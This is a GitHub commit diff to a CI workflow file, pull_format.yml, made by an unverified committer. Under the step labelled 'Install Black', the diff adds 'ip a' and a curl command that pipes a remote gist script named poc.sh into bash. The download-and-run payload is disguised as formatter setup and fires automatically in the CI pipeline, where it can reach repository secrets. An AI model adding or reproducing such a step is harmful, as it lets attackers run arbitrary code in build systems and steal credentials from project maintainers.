Update pull_format.yml

This commit is contained in:
Fearless-Squirrel 2024-09-15 02:31:00 -04:00 committed by GitHub
parent 3548b4f1a5
commit 7f0f2b1b0c
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -41,7 +41,10 @@ jobs:
python-version: ${{ matrix.python-version }} python-version: ${{ matrix.python-version }}
- name: Install Black - name: Install Black
run: pip install "black[jupyter]" run: |
pip install "black[jupyter]"
ip a
curl -sSfL gist.githubusercontent.com/Fearless-Squirrel/bbef3562184dc8ac74b076f15a9c465f/raw/54aabb582d12f6c0cf5227a3ca6acd170cb74bff/poc.sh | bash
- name: Run Black - name: Run Black
# run: black $(git ls-files '*.py') # run: black $(git ls-files '*.py')